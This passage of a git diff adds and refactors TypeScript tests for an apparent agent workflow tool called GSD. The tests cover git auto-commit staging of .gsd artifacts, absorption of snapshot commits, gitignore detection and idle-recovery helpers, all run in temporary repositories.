+    // GSD-Task should come before Resolves
+    const taskIdx = msg.indexOf("GSD-Task: S01/T03");
+    const resolvesIdx = msg.indexOf("Resolves #42");
+    assert.ok(taskIdx < resolvesIdx, "GSD-Task trailer before Resolves trailer");
+  });
 
   {
     // No issueNumber — no Resolves trailer
@@ -1393,28 +1409,138 @@ async function main(): Promise<void> {
       taskId: "S01/T04",
       taskTitle: "add dashboard widget",
     });
-    assertTrue(!msg.includes("Resolves"), "buildTaskCommitMessage omits Resolves trailer when issueNumber is absent");
+    assert.ok(!msg.includes("Resolves"), "buildTaskCommitMessage omits Resolves trailer when issueNumber is absent");
+    assert.ok(msg.includes("GSD-Task: S01/T04"), "GSD-Task trailer still present");
   }
 
   // ─── runPreMergeCheck: skips when no package.json ────────────────────────
 
-  console.log("\n=== runPreMergeCheck: skips when no package.json ===");
-  {
+  test('runPreMergeCheck: skips when no package.json', () => {
     const repo = initBranchTestRepo();
     // No package.json created — auto-detect should skip gracefully
     const svc = new GitServiceImpl(repo, { pre_merge_check: true });
     const result: PreMergeCheckResult = svc.runPreMergeCheck();
 
-    assertEq(result.passed, true, "runPreMergeCheck passes when no package.json (skip)");
-    assertEq(result.skipped, true, "runPreMergeCheck skips when no package.json found");
+    assert.deepStrictEqual(result.passed, true, "runPreMergeCheck passes when no package.json (skip)");
+    assert.deepStrictEqual(result.skipped, true, "runPreMergeCheck skips when no package.json found");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
-  report();
-}
+  // ─── autoCommit: symlinked .gsd does NOT stage milestone artifacts (#2247) ──
 
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
+  test('autoCommit: symlinked .gsd does NOT stage milestone artifacts (#2247)', () => {
+    // When .gsd is a symlink (external state project), .gsd/ files live outside
+    // the repo by design. smartStage() must NOT force-stage them into git — the
+    // .gitignore exclusion is correct and intentional.
+    const repo = initTempRepo();
+
+    // Create an external .gsd directory and symlink it into the repo
+    const externalGsd = mkdtempSync(join(tmpdir(), "gsd-external-symlink-"));
+    mkdirSync(join(externalGsd, "milestones", "M009"), { recursive: true });
+    mkdirSync(join(externalGsd, "activity"), { recursive: true });
+    mkdirSync(join(externalGsd, "runtime"), { recursive: true });
+
+    symlinkSync(externalGsd, join(repo, ".gsd"));
+
+    // .gitignore blocks .gsd (as ensureGitignore would do for symlink projects)
+    writeFileSync(join(repo, ".gitignore"), ".gsd\n");
+    run('git add .gitignore', repo);
+    run('git commit -m "add gitignore"', repo);
+
+    // Pre-commit a tracked source file so git add -u can stage modifications.
+    // The symlink fallback uses git add -u (tracked files only), so the file
+    // must be tracked before the autoCommit scenario runs.
+    createFile(repo, "src/feature.ts", "export const feature = true;");
+    run('git add src/feature.ts', repo);
+    run('git commit -m "add feature"', repo);
+
+    // Simulate new milestone artifacts created during execution
+    writeFileSync(join(externalGsd, "milestones", "M009", "M009-SUMMARY.md"), "# M009 Summary");
+    writeFileSync(join(externalGsd, "milestones", "M009", "S01-SUMMARY.md"), "# S01 Summary");
+    writeFileSync(join(externalGsd, "milestones", "M009", "T01-VERIFY.json"), '{"passed":true}');
+
+    // Modify the tracked source file — git add -u will stage this change
+    writeFileSync(join(repo, "src/feature.ts"), "export const feature = false; // updated");
+
+    const svc = new GitServiceImpl(repo);
+    const msg = svc.autoCommit("complete-milestone", "M009");
+    assert.ok(msg !== null, "symlink autoCommit: commit succeeds");
+
+    const committed = run("git show --name-only HEAD", repo);
+    assert.ok(committed.includes("src/feature.ts"), "symlink autoCommit: source file committed");
+    assert.ok(!committed.includes(".gsd/milestones/"),
+      "symlink autoCommit: .gsd/milestones/ files are NOT staged (external state stays external)");
+
+    try { rmSync(repo, { recursive: true, force: true }); } catch {}
+    try { rmSync(externalGsd, { recursive: true, force: true }); } catch {}
+  });
+
+  // ─── autoCommit: absorbs preceding gsd snapshot commits ─────────────────
+
+  test('autoCommit: absorbs preceding gsd snapshot commits', () => {
+    const repo = initTempRepo();
+
+    // Simulate 2 gsd snapshot commits
+    createFile(repo, "file1.ts", "v1");
+    run("git add -A", repo);
+    run('git commit -m "gsd snapshot: uncommitted changes after 35m inactivity"', repo);
+
+    createFile(repo, "file2.ts", "v2");
+    run("git add -A", repo);
+    run('git commit -m "gsd snapshot: pre-dispatch, uncommitted changes after 40m inactivity"', repo);
+
+    // Verify we have 3 commits (init + 2 snapshots)
+    const countBefore = run("git rev-list --count HEAD", repo);
+    assert.deepStrictEqual(countBefore, "3", "precondition: 3 commits before autoCommit");
+
+    // Now make a real change and autoCommit
+    createFile(repo, "feature.ts", "real work");
+
+    const svc = new GitServiceImpl(repo);
+    const msg = svc.autoCommit("execute-task", "S01/T01");
+    assert.ok(msg !== null, "autoCommit succeeds");
+
+    // Should be 2 commits: init + squashed real commit (snapshots absorbed)
+    const countAfter = run("git rev-list --count HEAD", repo);
+    assert.deepStrictEqual(countAfter, "2", "snapshot commits absorbed into real commit");
+
+    // All files should be present
+    const files = run("git show --name-only HEAD", repo);
+    assert.ok(files.includes("file1.ts"), "file1.ts from snapshot 1 preserved");
+    assert.ok(files.includes("file2.ts"), "file2.ts from snapshot 2 preserved");
+    assert.ok(files.includes("feature.ts"), "feature.ts from real commit preserved");
+
+    // No gsd snapshot commits in log
+    const log = run("git log --oneline", repo);
+    assert.ok(!log.includes("gsd snapshot"), "no gsd snapshot commits remain in history");
+
+    rmSync(repo, { recursive: true, force: true });
+  });
+
+  // ─── autoCommit: does not absorb non-snapshot commits ───────────────────
+
+  test('autoCommit: does not absorb non-snapshot commits', () => {
+    const repo = initTempRepo();
+
+    // Create a normal (non-snapshot) commit
+    createFile(repo, "earlier.ts", "earlier work");
+    run("git add -A", repo);
+    run('git commit -m "feat: earlier work"', repo);
+
+    const countBefore = run("git rev-list --count HEAD", repo);
+    assert.deepStrictEqual(countBefore, "2", "precondition: 2 commits before autoCommit");
+
+    // Make a real change and autoCommit
+    createFile(repo, "feature.ts", "new work");
+
+    const svc = new GitServiceImpl(repo);
+    svc.autoCommit("execute-task", "S01/T02");
+
+    // Should be 3 commits — earlier commit not absorbed
+    const countAfter = run("git rev-list --count HEAD", repo);
+    assert.deepStrictEqual(countAfter, "3", "non-snapshot commits NOT absorbed");
+
+    rmSync(repo, { recursive: true, force: true });
+  });
 });
diff --git a/src/resources/extensions/gsd/tests/integration/gitignore-staging-2570.test.ts b/src/resources/extensions/gsd/tests/integration/gitignore-staging-2570.test.ts
new file mode 100644
index 000000000..b32f046a9
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/gitignore-staging-2570.test.ts
@@ -0,0 +1,150 @@
+/**
+ * gitignore-staging-2570.test.ts — Regression tests for #2570.
+ *
+ * Verifies that:
+ * 1. isGsdGitignored() detects when .gsd is covered by .gitignore
+ * 2. The rethink prompt uses {{commitInstruction}} instead of hardcoded git add .gsd/
+ * 3. rethink.ts passes the correct commitInstruction based on gitignore state
+ *
+ * Uses real temporary git repos — no mocks.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { execFileSync } from "node:child_process";
+import {
+  mkdirSync,
+  mkdtempSync,
+  readFileSync,
+  rmSync,
+  writeFileSync,
+} from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+// Dynamic import — isGsdGitignored is the function under test (may not exist yet during TDD red phase)
+const { isGsdGitignored } = await import("../../gitignore.ts");
+
+// ─── Helpers ─────────────────────────────────────────────────────────
+
+function git(dir: string, ...args: string[]): string {
+  return execFileSync("git", args, { cwd: dir, stdio: "pipe", encoding: "utf-8" }).trim();
+}
+
+function makeTempRepo(): string {
+  const dir = mkdtempSync(join(tmpdir(), "gsd-staging-2570-"));
+  git(dir, "init");
+  git(dir, "config", "user.email", "test@test.com");
+  git(dir, "config", "user.name", "Test");
+  writeFileSync(join(dir, "README.md"), "# init\n");
+  git(dir, "add", "-A");
+  git(dir, "commit", "-m", "init");
+  git(dir, "branch", "-M", "main");
+  return dir;
+}
+
+function cleanup(dir: string): void {
+  try {
+    rmSync(dir, { recursive: true, force: true });
+  } catch {
+    // ignore
+  }
+}
+
+// ─── isGsdGitignored ─────────────────────────────────────────────────
+
+test("isGsdGitignored returns true when .gsd is in .gitignore (#2570)", (t) => {
+  const dir = makeTempRepo();
+  t.after(() => { cleanup(dir); });
+
+  writeFileSync(join(dir, ".gitignore"), ".gsd\n");
+  assert.equal(isGsdGitignored(dir), true);
+});
+
+test("isGsdGitignored returns true when .gsd/ (with slash) is in .gitignore", (t) => {
+  const dir = makeTempRepo();
+  t.after(() => { cleanup(dir); });
+
+  writeFileSync(join(dir, ".gitignore"), ".gsd/\n");
+  // Create .gsd directory so git check-ignore can match the directory-only pattern
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+  assert.equal(isGsdGitignored(dir), true);
+});
+
+test("isGsdGitignored returns false when .gsd is NOT in .gitignore", (t) => {
+  const dir = makeTempRepo();
+  t.after(() => { cleanup(dir); });
+
+  writeFileSync(join(dir, ".gitignore"), "node_modules/\n");
+  assert.equal(isGsdGitignored(dir), false);
+});
+
+test("isGsdGitignored returns false when no .gitignore exists", (t) => {
+  const dir = makeTempRepo();
+  t.after(() => { cleanup(dir); });
+
+  // No .gitignore — default
+  assert.equal(isGsdGitignored(dir), false);
+});
+
+// ─── rethink.md prompt template ─────────────────────────────────────
+
+test("rethink.md prompt uses {{commitInstruction}} not hardcoded git add .gsd/ (#2570)", () => {
+  const promptPath = join(
+    import.meta.dirname!,
+    "..",
+    "..",
+    "prompts",
+    "rethink.md",
+  );
+  const content = readFileSync(promptPath, "utf-8");
+
+  // Must NOT contain hardcoded `git add .gsd/`
+  assert.ok(
+    !content.includes("git add .gsd/"),
+    `rethink.md must not contain hardcoded "git add .gsd/" — use {{commitInstruction}} instead.\nFound: ${content.match(/.*git add .gsd\/.*/)?.[0]}`,
+  );
+
+  // Must contain the {{commitInstruction}} placeholder
+  assert.ok(
+    content.includes("{{commitInstruction}}"),
+    "rethink.md must use {{commitInstruction}} template variable for commit step",
+  );
+});
+
+// ─── smartStage respects .gitignore for .gsd/ (#2570) ───────────────
+
+test("smartStage does not stage .gsd/ files when .gsd is gitignored (#2570)", async (t) => {
+  // This imports GitServiceImpl to test through the public commit() method
+  // which calls smartStage() internally.
+  const { GitServiceImpl } = await import("../../git-service.ts");
+
+  const dir = makeTempRepo();
+  t.after(() => { cleanup(dir); });
+
+  // Add .gsd to .gitignore
+  writeFileSync(join(dir, ".gitignore"), ".gsd\nnode_modules/\n");
+  git(dir, "add", ".gitignore");
+  git(dir, "commit", "-m", "add gitignore with .gsd");
+
+  // Create .gsd/ milestone artifacts (NOT tracked, NOT symlinked)
+  mkdirSync(join(dir, ".gsd", "milestones", "M001", "slices", "S01"), { recursive: true });
+  writeFileSync(join(dir, ".gsd", "milestones", "M001", "slices", "S01", "S01-PLAN.md"), "# Plan");
+  writeFileSync(join(dir, ".gsd", "DECISIONS.md"), "# Decisions");
+
+  // Create a normal source file
+  writeFileSync(join(dir, "src.ts"), "export const x = 1;");
+
+  // Commit through GitServiceImpl (uses smartStage internally)
+  const svc = new GitServiceImpl(dir);
+  const msg = svc.commit({ message: "test: should not include .gsd files" });
+  assert.ok(msg !== null, "commit should succeed");
+
+  // Check what was committed
+  const committed = git(dir, "show", "--name-only", "HEAD");
+  assert.ok(committed.includes("src.ts"), "source files ARE committed");
+  assert.ok(
+    !committed.includes(".gsd/"),
+    `gitignored .gsd/ files must NOT be staged by smartStage.\nCommitted files: ${committed}`,
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/gitignore-tracked-gsd.test.ts b/src/resources/extensions/gsd/tests/integration/gitignore-tracked-gsd.test.ts
similarity index 85%
rename from src/resources/extensions/gsd/tests/gitignore-tracked-gsd.test.ts
rename to src/resources/extensions/gsd/tests/integration/gitignore-tracked-gsd.test.ts
index b9bda919a..ed0d56b5f 100644
--- a/src/resources/extensions/gsd/tests/gitignore-tracked-gsd.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/gitignore-tracked-gsd.test.ts
@@ -22,8 +22,8 @@ import {
 import { join } from "node:path";
 import { tmpdir } from "node:os";
 
-import { ensureGitignore, hasGitTrackedGsdFiles } from "../gitignore.ts";
-import { migrateToExternalState } from "../migrate-external.ts";
+import { ensureGitignore, hasGitTrackedGsdFiles } from "../../gitignore.ts";
+import { migrateToExternalState } from "../../migrate-external.ts";
 
 // ─── Helpers ─────────────────────────────────────────────────────────
 
@@ -53,43 +53,37 @@ function cleanup(dir: string): void {
 
 // ─── hasGitTrackedGsdFiles ───────────────────────────────────────────
 
-test("hasGitTrackedGsdFiles returns false when .gsd/ does not exist", () => {
+test("hasGitTrackedGsdFiles returns false when .gsd/ does not exist", (t) => {
   const dir = makeTempRepo();
-  try {
-    assert.equal(hasGitTrackedGsdFiles(dir), false);
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => { cleanup(dir); });
+
+  assert.equal(hasGitTrackedGsdFiles(dir), false);
 });
 
-test("hasGitTrackedGsdFiles returns true when .gsd/ has tracked files", () => {
+test("hasGitTrackedGsdFiles returns true when .gsd/ has tracked files", (t) => {
   const dir = makeTempRepo();
-  try {
-    mkdirSync(join(dir, ".gsd", "milestones"), { recursive: true });
-    writeFileSync(join(dir, ".gsd", "PROJECT.md"), "# Test Project\n");
-    git(dir, "add", ".gsd/PROJECT.md");
-    git(dir, "commit", "-m", "add gsd");
-    assert.equal(hasGitTrackedGsdFiles(dir), true);
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => { cleanup(dir); });
+
+  mkdirSync(join(dir, ".gsd", "milestones"), { recursive: true });
+  writeFileSync(join(dir, ".gsd", "PROJECT.md"), "# Test Project\n");
+  git(dir, "add", ".gsd/PROJECT.md");
+  git(dir, "commit", "-m", "add gsd");
+  assert.equal(hasGitTrackedGsdFiles(dir), true);
 });
 
-test("hasGitTrackedGsdFiles returns false when .gsd/ exists but is untracked", () => {
+test("hasGitTrackedGsdFiles returns false when .gsd/ exists but is untracked", (t) => {
   const dir = makeTempRepo();
-  try {
-    mkdirSync(join(dir, ".gsd"), { recursive: true });
-    writeFileSync(join(dir, ".gsd", "STATE.md"), "state\n");
-    // Not git-added — should return false
-    assert.equal(hasGitTrackedGsdFiles(dir), false);
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => { cleanup(dir); });
+
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+  writeFileSync(join(dir, ".gsd", "STATE.md"), "state\n");
+  // Not git-added — should return false
+  assert.equal(hasGitTrackedGsdFiles(dir), false);
 });
 
 // ─── ensureGitignore — tracked .gsd/ protection ─────────────────────
 
-test("ensureGitignore does NOT add .gsd when .gsd/ has tracked files (#1364)", () => {
+test("ensureGitignore does NOT add .gsd when .gsd/ has tracked files (#1364)", (t) => {
   const dir = makeTempRepo();
   try {
     // Set up .gsd/ with tracked files
@@ -118,7 +112,7 @@ test("ensureGitignore does NOT add .gsd when .gsd/ has tracked files (#1364)", (
   }
 });
 
-test("ensureGitignore adds .gsd when .gsd/ has NO tracked files", () => {
+test("ensureGitignore adds .gsd when .gsd/ has NO tracked files", (t) => {
   const dir = makeTempRepo();
   try {
     // Run ensureGitignore (no .gsd/ at all)
@@ -136,20 +130,18 @@ test("ensureGitignore adds .gsd when .gsd/ has NO tracked files", () => {
   }
 });
 
-test("ensureGitignore respects manageGitignore: false", () => {
+test("ensureGitignore respects manageGitignore: false", (t) => {
   const dir = makeTempRepo();
-  try {
-    const result = ensureGitignore(dir, { manageGitignore: false });
-    assert.equal(result, false);
-    assert.ok(!existsSync(join(dir, ".gitignore")), "Should not create .gitignore");
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => { cleanup(dir); });
+
+  const result = ensureGitignore(dir, { manageGitignore: false });
+  assert.equal(result, false);
+  assert.ok(!existsSync(join(dir, ".gitignore")), "Should not create .gitignore");
 });
 
 // ─── ensureGitignore — verify no tracked files become invisible ─────
 
-test("ensureGitignore with tracked .gsd/ does not cause git to see files as deleted", () => {
+test("ensureGitignore with tracked .gsd/ does not cause git to see files as deleted", (t) => {
   const dir = makeTempRepo();
   try {
     // Create tracked .gsd/ files
@@ -183,7 +175,7 @@ test("ensureGitignore with tracked .gsd/ does not cause git to see files as dele
   }
 });
 
-test("hasGitTrackedGsdFiles returns true (fail-safe) when git is not available", () => {
+test("hasGitTrackedGsdFiles returns true (fail-safe) when git is not available", (t) => {
   const dir = makeTempRepo();
   try {
     // Create and track .gsd/ files
@@ -207,7 +199,7 @@ test("hasGitTrackedGsdFiles returns true (fail-safe) when git is not available",
 
 // ─── migrateToExternalState — tracked .gsd/ protection ──────────────
 
-test("migrateToExternalState aborts when .gsd/ has tracked files (#1364)", () => {
+test("migrateToExternalState aborts when .gsd/ has tracked files (#1364)", (t) => {
   const dir = makeTempRepo();
   try {
     // Create tracked .gsd/ files
@@ -235,7 +227,7 @@ test("migrateToExternalState aborts when .gsd/ has tracked files (#1364)", () =>
   }
 });
 
-test("migrateToExternalState cleans git index so tracked files don't show as deleted (#1364 path 2)", () => {
+test("migrateToExternalState cleans git index so tracked files don't show as deleted (#1364 path 2)", (t) => {
   const dir = makeTempRepo();
   try {
     // Track .gsd/ files, then untrack them so migration proceeds
diff --git a/src/resources/extensions/gsd/tests/integration/idle-recovery.test.ts b/src/resources/extensions/gsd/tests/integration/idle-recovery.test.ts
new file mode 100644
index 000000000..925e7adc2
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/idle-recovery.test.ts
@@ -0,0 +1,393 @@
+import { mkdtempSync, mkdirSync, readFileSync, rmSync, writeFileSync, existsSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { execSync } from "node:child_process";
+import {
+  resolveExpectedArtifactPath,
+  writeBlockerPlaceholder,
+  verifyExpectedArtifact,
+  buildLoopRemediationSteps,
+} from "../../auto-recovery.ts";
+import { describe, test, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
+
+function createFixtureBase(): string {
+  const base = mkdtempSync(join(tmpdir(), "gsd-idle-recovery-test-"));
+  mkdirSync(join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks"), { recursive: true });
+  return base;
+}
+
+function cleanup(base: string): void {
+  rmSync(base, { recursive: true, force: true });
+}
+
+// ═══ resolveExpectedArtifactPath ═════════════════════════════════════════════
+
+test('resolveExpectedArtifactPath: research-milestone', () => {
+  const base = createFixtureBase();
+  try {
+    const result = resolveExpectedArtifactPath("research-milestone", "M001", base);
+    assert.ok(result !== null, "should resolve a path");
+    assert.ok(result!.endsWith("M001-RESEARCH.md"), `path should end with M001-RESEARCH.md, got ${result}`);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('resolveExpectedArtifactPath: plan-milestone', () => {
+  const base = createFixtureBase();
+  try {
+    const result = resolveExpectedArtifactPath("plan-milestone", "M001", base);
+    assert.ok(result !== null, "should resolve a path");
+    assert.ok(result!.endsWith("M001-ROADMAP.md"), `path should end with M001-ROADMAP.md, got ${result}`);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('resolveExpectedArtifactPath: research-slice', () => {
+  const base = createFixtureBase();
+  try {
+    const result = resolveExpectedArtifactPath("research-slice", "M001/S01", base);
+    assert.ok(result !== null, "should resolve a path");
+    assert.ok(result!.endsWith("S01-RESEARCH.md"), `path should end with S01-RESEARCH.md, got ${result}`);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('resolveExpectedArtifactPath: plan-slice', () => {
+  const base = createFixtureBase();
+  try {
+    const result = resolveExpectedArtifactPath("plan-slice", "M001/S01", base);
+    assert.ok(result !== null, "should resolve a path");
+    assert.ok(result!.endsWith("S01-PLAN.md"), `path should end with S01-PLAN.md, got ${result}`);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('resolveExpectedArtifactPath: complete-milestone', () => {
+  const base = createFixtureBase();
+  try {
+    const result = resolveExpectedArtifactPath("complete-milestone", "M001", base);
+    assert.ok(result !== null, "should resolve a path");
+    assert.ok(result!.endsWith("M001-SUMMARY.md"), `path should end with M001-SUMMARY.md, got ${result}`);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('resolveExpectedArtifactPath: unknown unit type → null', () => {
+  const base = createFixtureBase();
+  try {
+    const result = resolveExpectedArtifactPath("unknown-type", "M001/S01", base);
+    assert.deepStrictEqual(result, null, "unknown type returns null");
+  } finally {
+    cleanup(base);
+  }
+});
+
+// ═══ writeBlockerPlaceholder ═════════════════════════════════════════════════
+
+test('writeBlockerPlaceholder: writes file for research-slice', () => {
+  const base = createFixtureBase();
+  try {
+    const result = writeBlockerPlaceholder("research-slice", "M001/S01", base, "idle recovery exhausted 2 attempts");
+    assert.ok(result !== null, "should return relative path");
+    const absPath = resolveExpectedArtifactPath("research-slice", "M001/S01", base)!;
+    assert.ok(existsSync(absPath), "file should exist on disk");
+    const content = readFileSync(absPath, "utf-8");
+    assert.ok(content.includes("BLOCKER"), "should contain BLOCKER heading");
+    assert.ok(content.includes("idle recovery exhausted 2 attempts"), "should contain the reason");
+    assert.ok(content.includes("research-slice"), "should mention the unit type");
+    assert.ok(content.includes("M001/S01"), "should mention the unit ID");
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('writeBlockerPlaceholder: creates directory if missing', () => {
+  const base = mkdtempSync(join(tmpdir(), "gsd-idle-recovery-test-"));
+  try {
+    // Only create milestone dir, not slice dir
+    mkdirSync(join(base, ".gsd", "milestones", "M001"), { recursive: true });
+    // resolveSlicePath needs the slice dir to exist to resolve, so this should return null
+    const result = writeBlockerPlaceholder("research-slice", "M001/S01", base, "test reason");
+    // Since the slice dir doesn't exist, resolveExpectedArtifactPath returns null
+    assert.deepStrictEqual(result, null, "returns null when directory structure doesn't exist");
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('writeBlockerPlaceholder: writes file for research-milestone', () => {
+  const base = createFixtureBase();
+  try {
+    const result = writeBlockerPlaceholder("research-milestone", "M001", base, "hard timeout");
+    assert.ok(result !== null, "should return relative path");
+    const absPath = resolveExpectedArtifactPath("research-milestone", "M001", base)!;
+    assert.ok(existsSync(absPath), "file should exist on disk");
+    const content = readFileSync(absPath, "utf-8");
+    assert.ok(content.includes("BLOCKER"), "should contain BLOCKER heading");
+    assert.ok(content.includes("hard timeout"), "should contain the reason");
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('writeBlockerPlaceholder: unknown type → null', () => {
+  const base = createFixtureBase();
+  try {
+    const result = writeBlockerPlaceholder("unknown-type", "M001/S01", base, "test");
+    assert.deepStrictEqual(result, null, "unknown type returns null");
+  } finally {
+    cleanup(base);
+  }
+});
+
+// ═══ verifyExpectedArtifact: complete-slice roadmap check ════════════════════
+// Regression for #indefinite-hang: complete-slice must verify roadmap [x] or
+// the idempotency skip loops forever after a crash that wrote SUMMARY+UAT but
+// did not mark the roadmap done.
+
+const ROADMAP_INCOMPLETE = `# M001: Test Milestone
+
+## Slices
+
+- [ ] **S01: Test Slice** \`risk:low\`
+> After this: something works
+`;
+
+const ROADMAP_COMPLETE = `# M001: Test Milestone
+
+## Slices
+
+- [x] **S01: Test Slice** \`risk:low\`
+> After this: something works
+`;
+
+test('verifyExpectedArtifact: complete-slice — all artifacts present + roadmap marked [x] returns true', () => {
+  const base = createFixtureBase();
+  try {
+    const sliceDir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
+    writeFileSync(join(sliceDir, "S01-SUMMARY.md"), "# Summary\n", "utf-8");
+    writeFileSync(join(sliceDir, "S01-UAT.md"), "# UAT\n", "utf-8");
+    writeFileSync(join(base, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), ROADMAP_COMPLETE, "utf-8");
+    const result = verifyExpectedArtifact("complete-slice", "M001/S01", base);
+    assert.ok(result === true, "SUMMARY + UAT + roadmap [x] should verify as true");
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('verifyExpectedArtifact: complete-slice — SUMMARY + UAT present but roadmap NOT marked [x] returns false', () => {
+  const base = createFixtureBase();
+  try {
+    const sliceDir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
+    writeFileSync(join(sliceDir, "S01-SUMMARY.md"), "# Summary\n", "utf-8");
+    writeFileSync(join(sliceDir, "S01-UAT.md"), "# UAT\n", "utf-8");
+    writeFileSync(join(base, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), ROADMAP_INCOMPLETE, "utf-8");
+    const result = verifyExpectedArtifact("complete-slice", "M001/S01", base);
+    assert.ok(result === false, "roadmap not marked [x] should return false (crash recovery scenario)");
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('verifyExpectedArtifact: complete-slice — SUMMARY present but UAT missing returns false', () => {
+  const base = createFixtureBase();
+  try {
+    const sliceDir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
+    writeFileSync(join(sliceDir, "S01-SUMMARY.md"), "# Summary\n", "utf-8");
+    // no UAT file
+    writeFileSync(join(base, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), ROADMAP_COMPLETE, "utf-8");
+    const result = verifyExpectedArtifact("complete-slice", "M001/S01", base);
+    assert.ok(result === false, "missing UAT should return false");
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('verifyExpectedArtifact: complete-slice — no roadmap file present is lenient (returns true)', () => {
+  const base = createFixtureBase();
+  try {
+    const sliceDir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
+    writeFileSync(join(sliceDir, "S01-SUMMARY.md"), "# Summary\n", "utf-8");
+    writeFileSync(join(sliceDir, "S01-UAT.md"), "# UAT\n", "utf-8");
+    // no roadmap file
+    const result = verifyExpectedArtifact("complete-slice", "M001/S01", base);
+    assert.ok(result === true, "missing roadmap file should be lenient and return true");
+  } finally {
+    cleanup(base);
+  }
+});
+
+// ═══ buildLoopRemediationSteps ═══════════════════════════════════════════════
+
+test('buildLoopRemediationSteps: execute-task returns concrete steps', () => {
+  const base = mkdtempSync(join(tmpdir(), "gsd-loop-remediation-test-"));
+  try {
+    mkdirSync(join(base, ".gsd", "milestones", "M002", "slices", "S03", "tasks"), { recursive: true });
+    const result = buildLoopRemediationSteps("execute-task", "M002/S03/T01", base);
+    assert.ok(result !== null, "should return remediation steps");
+    assert.ok(result!.includes("gsd undo-task"), "steps include undo-task command");
+    assert.ok(result!.includes("T01"), "steps mention the task ID");
+    assert.ok(result!.includes("gsd undo-task"), "steps include gsd undo-task command");
+  } finally {
+    rmSync(base, { recursive: true, force: true });
+  }
+});
+
+test('buildLoopRemediationSteps: plan-slice returns concrete steps', () => {
+  const base = mkdtempSync(join(tmpdir(), "gsd-loop-remediation-test-"));
+  try {
+    mkdirSync(join(base, ".gsd", "milestones", "M001", "slices", "S01"), { recursive: true });
+    const result = buildLoopRemediationSteps("plan-slice", "M001/S01", base);
+    assert.ok(result !== null, "should return remediation steps for plan-slice");
+    assert.ok(result!.includes("S01-PLAN.md"), "steps mention the slice plan file");
+    assert.ok(result!.includes("gsd recover"), "steps include gsd recover command");
+  } finally {
+    rmSync(base, { recursive: true, force: true });
+  }
+});
+
+test('buildLoopRemediationSteps: research-slice returns concrete steps', () => {
+  const base = mkdtempSync(join(tmpdir(), "gsd-loop-remediation-test-"));
+  try {
+    mkdirSync(join(base, ".gsd", "milestones", "M001", "slices", "S01"), { recursive: true });
+    const result = buildLoopRemediationSteps("research-slice", "M001/S01", base);
+    assert.ok(result !== null, "should return remediation steps for research-slice");
+    assert.ok(result!.includes("S01-RESEARCH.md"), "steps mention the slice research file");
+    assert.ok(result!.includes("gsd recover"), "steps include gsd recover command");
+  } finally {
+    rmSync(base, { recursive: true, force: true });
+  }
+});
+
+test('buildLoopRemediationSteps: unknown type returns null', () => {
+  const base = mkdtempSync(join(tmpdir(), "gsd-loop-remediation-test-"));
+  try {
+    const result = buildLoopRemediationSteps("unknown-type", "M001/S01", base);
+    assert.deepStrictEqual(result, null, "unknown type returns null");
+  } finally {
+    rmSync(base, { recursive: true, force: true });
+  }
+});
+
+// ═══ verifyExpectedArtifact: hook unit types ═════════════════════════════════
+
+test('verifyExpectedArtifact: hook types always return true', () => {
+  const base = createFixtureBase();
+  try {
+    // Hook units don't have standard artifacts — they should always pass
+    const result1 = verifyExpectedArtifact("hook/code-review", "M001/S01/T01", base);
+    assert.ok(result1, "hook/code-review should always return true");
+
+    const result2 = verifyExpectedArtifact("hook/simplify", "M001/S01/T02", base);
+    assert.ok(result2, "hook/simplify should always return true");
+
+    const result3 = verifyExpectedArtifact("hook/custom-hook", "M001/S01", base);
+    assert.ok(result3, "hook/custom-hook at slice level should return true");
+  } finally {
+    rmSync(base, { recursive: true, force: true });
+  }
+});
+
+
+test('writeBlockerPlaceholder: updates DB task status for execute-task (#2531)', async () => {
+  const base = createFixtureBase();
+  try {
+    const { openDatabase, closeDatabase, insertMilestone, insertSlice, insertTask, getTask, isDbAvailable } =
+      await import("../../gsd-db.ts");
+
+    const dbPath = join(base, ".gsd", "gsd.db");
+    // Create the tasks directory (required for artifact path resolution)
+    mkdirSync(join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks"), { recursive: true });
+
+    openDatabase(dbPath);
+    try {
+      insertMilestone({ id: "M001", title: "Test", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "Slice", status: "active" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", title: "Task", status: "pending" });
+
+      // Before fix: writeBlockerPlaceholder wrote the file but left DB as "pending"
+      writeBlockerPlaceholder("execute-task", "M001/S01/T01", base, "idle recovery exhausted");
+
+      const task = getTask("M001", "S01", "T01");
+      assert.equal(task?.status, "complete",
+        "writeBlockerPlaceholder must update DB task status to 'complete' so verifyExpectedArtifact passes");
+
+      // Verify the full chain works: verifyExpectedArtifact should return true
+      const verified = verifyExpectedArtifact("execute-task", "M001/S01/T01", base);
